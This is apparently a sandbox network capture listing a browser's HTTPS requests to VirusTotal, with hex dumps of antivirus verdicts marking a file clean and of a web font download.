                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 74 69 6f 6e 22 3a 20 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 61 67 73 22 3a 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 61 73 74 5f 61 6e 61 6c 79 73 69 73 5f 72 65 73 75 6c 74 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 63 72 6f 6e 69 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 63 72 6f 6e 69 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73
                                                                                                                                                                                                                    Data Ascii: tion": 0, "tags": [], "last_analysis_results": { "Acronis": { "method": "blacklist", "engine_name": "Acronis", "category": "harmles
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 49 4c 61 62 73 20 28 4d 4f 4e 49 54 4f 52 41 50 50 29 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 6c 69 65 6e 56 61 75 6c 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22
                                                                                                                                                                                                                    Data Ascii: cklist", "engine_name": "AILabs (MONITORAPP)", "category": "harmless", "result": "clean" }, "AlienVault": { "method": "
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1280INData Raw: 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 75 74 6f 53 68 75 6e 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 75 74 6f 53 68 75 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20
                                                                                                                                                                                                                    Data Ascii: d", "result": "unrated" }, "AutoShun": { "method": "blacklist", "engine_name": "AutoShun", "category": "undetected",
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 6c 75 65 6c 69 76 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 42 6c 75 65 6c 69 76 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22
                                                                                                                                                                                                                    Data Ascii: result": "unrated" }, "Blueliv": { "method": "blacklist", "engine_name": "Blueliv", "category": "harmless", "result": "
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 53 6e 6f 72 74 20 49 50 20 73 61 6d 70 6c 65 20 6c 69 73 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 53 6e 6f 72 74 20 49 50 20 73 61 6d
                                                                                                                                                                                                                    Data Ascii: "category": "harmless", "result": "clean" }, "Snort IP sample list": { "method": "blacklist", "engine_name": "Snort IP sam
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 44 4e 53 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 44 72 2e 57 65 62 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "method": "blacklist", "engine_name": "DNS8", "category": "harmless", "result": "clean" }, "Dr.Web": {
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 6d 73 69 73 6f 66 74 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 6d 73 69 73 6f 66 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: lean" }, "Emsisoft": { "method": "blacklist", "engine_name": "Emsisoft", "category": "harmless", "result": "clean"


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    146192.168.2.164989774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC961OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTg3MTQ1MzcwNTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: b25bd233c0d97f3245b3ffedab4f138e
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 226
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC226INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 65 78 65 63 75 74 69 6f 6e 5f 70 61 72 65 6e 74 73 3f 6c 69 6d 69 74 3d 31 30 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents?limit=10" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    147192.168.2.164989874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC721OUTGET /gui/1fc6c01d1812fbfbaa47.woff2 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    Origin: https://www.virustotal.com
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/gui/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC316INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 177fbbe1418b744b8548ed39c8d75b62
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 15:58:55 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 15:58:55 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: font/woff2
                                                                                                                                                                                                                    Content-Length: 14780
                                                                                                                                                                                                                    Age: 532595
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1092INData Raw: 77 4f 46 32 00 01 00 00 00 00 39 bc 00 0d 00 00 00 00 88 6c 00 00 39 65 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 6e 1b cd 62 1c 90 1c 06 60 00 84 62 0a 81 8a 18 ec 7e 0b 84 64 00 01 36 02 24 03 89 44 04 20 05 84 6a 07 8c 34 1b 87 76 25 ca 6d 97 c2 ed 00 d6 eb 7b b9 fb 48 44 b0 71 30 b3 18 ef 8f 0c d4 69 b5 69 df ec ff 3f 27 95 43 6c 83 a4 c2 d8 fe 20 90 42 a1 ac 9a 95 ad e2 8a ed 58 76 3d c7 e5 f0 ac 4d 4f 86 f2 2e c1 fb a4 c5 ac f1 dc f0 86 c1 27 48 42 8e 73 e2 c7 3f 81 08 c9 a6 13 ca 5a 71 2b 15 9a 4d 33 4b 42 62 77 12 30 b1 61 13 bc af 11 f1 17 65 a0 fe bb 87 17 24 bc 1c e5 0c 6c 1b f9 93 9c bc 3c 0f 8d fb ff 5f 7b e6 e8 81 4e 56 83 e3 b7 93 91 9d d0 6e ff 55 76 82 e6 27 dc f4 df dd 25 21 90 60 1e 68 30 a9 51 2a fa 37
                                                                                                                                                                                                                    Data Ascii: wOF29l9enb`b~d6$D j4v%m{HDq0ii?'Cl BXv=MO.'HBs?Zq+M3KBbw0ae$l<_{NVnUv'%!`h0Q*7
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 40 14 14 84 85 84 88 c2 c2 b0 78 f1 44 09 12 08 12 25 22 92 25 63 44 44 b0 52 a4 d0 89 8a 92 49 95 ca 21 4d 36 b3 1c 39 8c aa aa 81 56 53 4d 9c 3a 0a 98 34 d2 0c d6 5c 0b 56 85 da 12 b5 53 04 eb ac 0b 99 ee f5 66 5b 8c 28 54 c6 8d 5a 8c 65 7b 80 cd 74 76 33 8f 71 66 99 4d 61 0e de 5c 72 f3 f0 e6 1f e5 16 58 c8 66 5b ad 6b ab 84 4c a3 85 81 2e 30 c0 62 48 cc b8 80 8a 62 08 e2 d9 2f 19 7e f5 5f e3 a8 d1 5c 4e 76 09 20 f9 92 19 30 2c 02 51 4c f5 f7 6f 73 4f 44 ca 70 21 68 58 cc 38 49 00 42 dd 07 1a 32 f7 a2 d8 5b 3d 88 95 2e 44 85 53 27 9e d4 51 0a c4 36 d3 09 dc 3a 0d 33 54 a9 31 9d 81 f4 4d d1 32 90 a4 ff 2b 6f ca da 5f 33 c3 fe ee c7 7c 14 ea 42 c1 37 11 b2 69 77 f4 9f 9a 49 61 4c 15 cf cb 76 93 68 cd 2b b1 ea da 19 6a 04 54 aa 45 db 5a 3d 90 59 9b 4b 39
                                                                                                                                                                                                                    Data Ascii: @xD%"%cDDRI!M69VSM:4\VSf[(TZe{tv3qfMa\rXf[kL.0bHb/~_\Nv 0,QLosODp!hX8IB2[=.DS'Q6:3T1M2+o_3|B7iwIaLvh+jTEZ=YK9
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: c0 0a eb c5 4f 37 52 30 71 72 89 e3 e6 a7 43 d3 61 8d a6 d1 56 6b 65 d6 6a e0 9d 50 e7 85 47 01 56 78 bd 6b 80 a9 70 03 dc 65 f4 fb 0d 0f d0 07 f3 c8 12 41 60 38 d0 41 c1 88 f1 3d 31 4b 0a 41 da a5 41 b7 51 28 70 c0 4c 8c 87 0d cf 62 87 89 25 68 84 b8 18 05 86 12 2d c5 6a 9e 54 cb c9 44 99 eb 48 ce 0e 4d c4 0d a6 89 7d 23 59 72 a2 e8 f1 88 28 a9 50 f2 94 6c 26 c6 ed f3 f2 95 a1 54 56 cb 55 d1 12 05 9a d1 68 30 d1 b8 df 23 17 29 14 41 33 8a b5 4c 0f cd da 77 22 45 8f 90 15 5d 46 8f c9 82 c6 9a 9d 6e 5f 99 90 f4 36 97 53 09 6a 1d c4 18 39 0f 44 94 cd c6 8c 44 93 f8 c1 24 cc 2a 44 bb 32 d0 ad 83 02 06 46 63 04 c8 d8 5b 4d 3c b2 39 d9 51 3d c5 dd 18 9e 13 15 d2 e8 07 6a 30 9b 44 35 eb 87 b5 c7 50 3a ac ee 00 5d 1b f4 57 64 61 1e ad 7f b4 b7 26 04 b7 8c 2c dd
                                                                                                                                                                                                                    Data Ascii: O7R0qrCaVkejPGVxkpeA`8A=1KAAQ(pLb%h-jTDHM}#Yr(Pl&TVUh0#)A3Lw"E]Fn_6Sj9DD$*D2Fc[M<9Q=j0D5P:]Wda&,
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC188INData Raw: 7b 99 48 89 34 74 0c cc ac 6c 1c 21 1c 37 4f 1c 52 20 35 2d 3d 13 0b 81 58 c3 c5 bd 17 08 1d c5 e4 3d 61 89 7a a4 82 43 2f 44 12 8f 81 a3 31 38 66 c8 d2 f8 d3 f7 35 0c e8 01 55 81 24 3c 02 b3 d3 41 d2 80 00 63 60 c8 61 67 80 40 49 8c 40 04 88 86 37 e0 23 c0 af e8 eb f8 02 f0 b3 37 14 5e 13 90 45 c1 b8 55 95 90 ce 82 4e bc 49 94 4b ac 44 21 a7 2f 65 20 e9 22 41 70 16 f1 da 2e b9 ec 8a ab ae b9 ee 86 9b 6e b9 eb 9e db ee c0 08 d7 f6 ef 30 89 cc 1a 6b ab 0e 06 2e 63 91 ab 1d 98 f5 48 88 1b 03 14 11 32 84 8b 46 b2 6c da eb 29 48 f3 16 84 c0 ef d1 b4 96 c5 b0 82
                                                                                                                                                                                                                    Data Ascii: {H4tl!7OR 5-=X=azC/D18f5U$<Ac`ag@I@7#7^EUNIKD!/e "Ap.n0k.cH2Fl)H
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: c2 6a 66 15 6d 11 a7 ad 1c 5a e0 fa 5a 36 5e 3e 76 69 6a cb f9 58 2f 4c d0 cf 8d c7 68 0e 47 ac 05 1c 6d 08 25 76 b9 0a c6 6a f8 93 37 86 e5 90 b9 f3 61 5e 77 6f a1 a3 88 3f 1c 3d 9f e9 c1 55 b5 8a 5b 2b 90 57 cb 91 27 99 03 8a c0 40 45 96 50 1f 5b 84 03 25 10 82 a0 e6 00 0d 54 33 c9 44 41 20 c9 81 48 05 84 b7 a6 d5 c1 8a 64 98 86 81 d1 7a 62 ea 62 48 a0 e6 9b 21 f8 70 48 8e 14 48 25 dd 7d 72 85 10 b9 1a 69 0e 8f d0 d8 f5 04 22 e8 34 d9 1f e4 36 95 30 aa aa 49 af 8e 86 2c 1a 6b 46 d4 42 1b 6e 6d fd 27 a0 bd 2e 12 61 c9 3e af 9d 65 f4 da 0b 8f dc f5 b9 0f dd 70 c9 3b 5e 77 c2 61 7b 8d da 64 d0 cb 56 5a 6c ae 5e 5d 5a d4 ab 56 c1 c7 c1 44 43 2e 2a 81 9f 93 c0 40 45 86 28 f8 ed 0f 3f f9 c6 63 77 5d 77 d1 69 47 ed b7 d3 66 6b 2d b7 10 26 49 b6 6e 2b 0d 53 5b
                                                                                                                                                                                                                    Data Ascii: jfmZZ6^>vijX/LhGm%vj7a^wo?=U[+W'@EP[%T3DA HdzbbH!pHH%}ri"460I,kFBnm'.a>ep;^wa{dVZl^]ZVDC.*@E(?cw]wiGfk-&In+S[
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 23 b4 99 41 5c df 07 d1 1d 83 a5 75 23 55 86 82 7a df c7 5f 23 d6 01 26 f0 a0 71 47 85 1c a0 66 d4 a1 1d 34 55 69 5b 48 53 c0 cd fc 14 aa 92 ed 6c c7 cb 8c b4 95 79 21 c6 26 a1 4e 38 d4 9f c9 4f b5 86 74 1d 80 81 8c 62 17 64 55 62 6b 84 19 2d 0b 7b 14 d2 9b 3f f3 12 1d 65 8d f6 ac de 2c b2 a1 03 0a f3 dd 3b ed fb f7 05 6d c4 8c 97 29 9f 76 9a 47 af 14 5d 61 88 69 f8 8d db 5c 18 06 99 3d 56 65 a8 41 76 6c b2 4a 7a cb 59 72 a7 5d a5 b3 0a 12 09 36 59 f2 69 af 16 16 10 c0 00 07 f6 88 8c 9c e1 59 2e 5a b9 cd 73 df 06 23 59 d9 94 61 c6 c6 8d 91 84 f1 54 da 55 a8 8f 3c 44 48 8b f8 70 4b 25 4f 81 2b 80 01 a4 a5 81 90 d4 e8 76 45 17 d9 8f e3 ea b3 c8 25 62 9d a2 ba ea 03 70 87 e7 b4 8b 78 17 5c bd 4b c0 f6 6b 96 71 b6 cb b2 3f cf 2a 68 4c 16 60 a9 7c 90 7b 84 7a
                                                                                                                                                                                                                    Data Ascii: #A\u#Uz_#&qGf4Ui[HSly!&N8OtbdUbk-{?e,;m)vG]ai\=VeAvlJzYr]6YiY.Zs#YaTU<DHpK%O+vE%bpx\Kkq?*hL`|{z
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1280INData Raw: 72 36 1f 57 71 f9 9a fd db 4d 01 c4 26 30 51 19 55 37 f6 03 57 25 0e cb af fe 47 a4 88 59 2f 25 3e 22 01 1c cc 1e 1a 92 a7 ea 83 0c 0f dd 29 04 54 c1 dc 87 08 60 7c ae 95 72 55 54 b9 8b 34 39 bd 9e 38 49 05 bc 44 5b 8b 6f 8d aa 60 37 30 12 ee 23 69 96 3b ff 66 e1 2a f8 a9 0c 44 0c f7 0b 2a c2 3e 9b 56 31 b3 9a 45 cb fa 33 95 6c 61 41 68 c3 0a ac b4 93 a0 e6 48 ab 88 0d 40 a2 a9 83 58 a5 17 51 33 2e fb d5 b2 a0 0d bc 70 51 9a 0f 40 4c e6 09 9a a5 60 3f 53 1c b4 00 d7 08 c2 69 51 95 b4 84 52 67 3a fa 52 46 8f c2 d1 20 04 48 a9 51 6b 54 0a 47 02 1d 4e c4 1d 87 53 f4 97 7a e7 62 bc 27 de ba 46 de a2 d4 1e fb 78 74 85 9b 57 d9 97 2a 62 03 67 34 86 d0 82 91 a6 b0 c7 f3 d8 a8 32 46 8e 8b 4b 93 0d 1d 1b e3 e8 b6 42 d4 a9 4a 29 83 2b 64 ad ea b3 8b ad 3b 76 5d 56
                                                                                                                                                                                                                    Data Ascii: r6WqM&0QU7W%GY/%>")T`|rUT498ID[o`70#i;f*D*>V1E3laAhH@XQ3.pQ@L`?SiQRg:RF HQkTGNSzb'FxtW*bg42FKBJ)+d;v]V
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 2c ed f2 ca 7b 6a 54 7b 79 36 09 a3 4e ab c0 45 74 22 09 c5 09 ef c1 bd 64 c5 82 c9 5c 56 27 97 76 b9 bd ca ae b8 5c ce d7 92 97 6f 6b 98 4b e6 b9 44 ac 1a 8d 9a 51 ed 12 09 21 0d 61 59 c7 57 76 32 f8 8b c3 ad 8b 66 b9 e4 5d b5 2a 19 a2 c1 2b 26 85 ae 20 1f 40 aa c4 77 5d c8 30 6c 81 cb 71 5e 1d 96 cc b5 4b 91 1a 55 8d 77 1a c8 c9 50 d5 2b 14 5d 2e b7 a2 ab 46 29 0a c6 7a 5a d2 26 61 2a 33 90 a8 47 24 a6 3d df 99 33 66 c4 3d 2d e2 47 ec 61 2d dd c4 e4 78 41 fc 4d 1d 49 9b d8 6a 56 59 64 64 ce c9 e7 97 b3 20 b3 a8 b9 13 ea 7c 13 fc f1 b7 33 d5 ac 22 84 53 50 c5 d3 4b 08 ca bf 50 7e aa 81 c9 47 ec 0e 06 27 ff b7 dd bb a8 5d f1 fb 10 8f 69 b7 33 39 f9 07 d2 fe e9 c4 14 07 c4 4d 5e 87 50 46 97 d8 1a 58 f6 9d c4 45 25 b0 ca 62 16 08 ac a6 32 18 59 84 cc 17 bb
                                                                                                                                                                                                                    Data Ascii: ,{jT{y6NEt"d\V'v\okKDQ!aYWv2f]*+& @w]0lq^KUwP+].F)zZ&a*3G$=3f=-Ga-xAMIjVYdd |3"SPKP~G']i39M^PFXE%b2Y
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 04 d2 8f 63 64 85 3e 48 63 f7 29 45 52 bd 90 89 e8 0d b2 30 bb 76 3a c2 14 b4 67 31 73 75 b2 b9 2f 31 35 94 37 9f 7d 65 82 3b 84 21 d6 b5 d3 4c 58 a3 27 c3 74 2b ed 3b 75 7c 06 e7 b8 da 0e be e3 70 fc c8 e8 f6 f8 81 70 a4 ee c0 f6 d1 ba 23 61 aa de 35 d4 df ef 5a af d7 b9 d7 f7 f7 bb 87 40 80 36 9c db 8d 6f fc 24 42 a9 58 43 03 f4 92 e6 96 35 5b 8c 73 24 4a 9d d7 c2 74 70 2e de 94 84 44 f2 60 34 e6 55 5b 16 2d 1e aa 88 f6 d5 15 df 86 c1 73 16 d8 8b a7 1a b6 bd ef e5 eb b4 7e 87 46 d7 e8 9d 49 b3 85 28 35 90 d8 a8 51 20 36 f8 ed ad 53 02 2c 09 df 45 66 19 78 6a 83 43 8b 9a a1 41 68 7a 96 44 e0 0d 31 81 f1 c9 0f 5f fd 92 a0 4d 42 9d 1c fa 4c f0 cd 59 a8 18 de 03 6f aa 81 6a ce 82 47 2c b0 15 85 f4 2f bf eb e1 6a 99 66 06 d3 29 70 06 42 66 aa e9 e2 23 34 83
